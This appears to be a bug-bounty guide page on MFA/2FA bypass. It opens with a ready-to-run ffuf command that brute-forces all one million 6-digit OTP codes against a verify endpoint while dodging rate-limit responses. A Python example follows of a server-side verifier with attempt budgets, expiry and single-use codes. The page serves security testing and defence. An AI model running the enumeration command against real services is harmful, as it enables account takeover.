hunt-mfa-bypass
19. MFA / 2FA BYPASS
Growing bug class with 7 distinct patterns. Pays High/Critical when it enables account takeover (ATO) without a prior session.
Pattern 1: No Rate Limit on OTP
```bash
# Test with ffuf — all 1M 6-digit codes
ffuf -u "https://target.com/api/verify-otp" \
  -X POST -H "Content-Type: application/json" \
  -H "Cookie: session=YOUR_SESSION" \
  -d '{"otp":"FUZZ"}' \
  -w <(seq -w 000000 999999) \
  -fc 400,429 -t 5
# -t 5 (slow down) — aggressive rates get 429 or ban
```
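The fix on the server side is an attempt budget bound to the pending OTP, not just an IP-based 429. The following is an added illustration, not code from this skill or from any product it targets: a verifier that locks and discards the code after a fixed number of wrong guesses, expires it after a TTL, makes it single use, and compares in constant time. `MAX_ATTEMPTS`, `OTP_TTL_SECONDS` and the `OtpVerifier` class are assumed names chosen for the example; the `simulate_guessing` helper feeds a constructed list of guesses to show the budget cutting the enumeration off.

```python
import hmac
import secrets
import time

MAX_ATTEMPTS = 5         # assumed policy: discard the code after 5 wrong guesses
OTP_TTL_SECONDS = 300    # assumed policy: a code is valid for 5 minutes


class OtpVerifier:
    """Server-side OTP check with a per-code attempt budget (illustrative)."""

    def __init__(self, now=time.time):
        self._now = now            # injectable clock so expiry can be tested
        self._pending = {}         # session_id -> {"otp", "issued", "failures"}

    def issue(self, session_id):
        """Generate a fresh 6-digit code for this session and return it."""
        otp = f"{secrets.randbelow(10**6):06d}"
        self._pending[session_id] = {"otp": otp, "issued": self._now(), "failures": 0}
        return otp

    def verify(self, session_id, submitted):
        """Return one of: ok, invalid, locked, expired, no_pending_otp."""
        rec = self._pending.get(session_id)
        if rec is None:
            return "no_pending_otp"
        if self._now() - rec["issued"] > OTP_TTL_SECONDS:
            del self._pending[session_id]
            return "expired"
        # constant-time compare: no timing side channel on partial matches
        if hmac.compare_digest(rec["otp"], str(submitted)):
            del self._pending[session_id]      # single use
            return "ok"
        rec["failures"] += 1
        if rec["failures"] >= MAX_ATTEMPTS:
            # budget exhausted: the code is gone, the client must trigger re-issue
            del self._pending[session_id]
            return "locked"
        return "invalid"


def simulate_guessing(verifier, session_id, guesses):
    """Submit guesses in order and return the outcome of each attempt made.

    Stops at the first terminal outcome, which is what an enumeration loop
    would observe: after MAX_ATTEMPTS wrong codes the endpoint stops answering
    'invalid' and the remaining guesses never get evaluated.
    """
    outcomes = []
    for g in guesses:
        r = verifier.verify(session_id, g)
        outcomes.append(r)
        if r != "invalid":
            break
    return outcomes


if __name__ == "__main__":
    v = OtpVerifier()
    code = v.issue("demo-session")
    # constructed guess list: ten codes that are certainly not the issued one
    wrong = [f"{i:06d}" for i in range(10) if f"{i:06d}" != code]
    print(simulate_guessing(v, "demo-session", wrong))
    print(v.verify("demo-session", code))   # budget spent, code already discarded
```

Re-issuing a code resets the budget, so the issue endpoint needs its own limit (per account and per IP) or the attacker just requests a new code every five guesses; with a fresh random code each time the success probability per issuance stays at 5/1,000,000, but unlimited issuance still turns into SMS or e-mail flooding. The `-fc 400,429` filter in the ffuf command above is exactly why a 429 alone is a weak control: the budget has to be tied to the code, not to the response status.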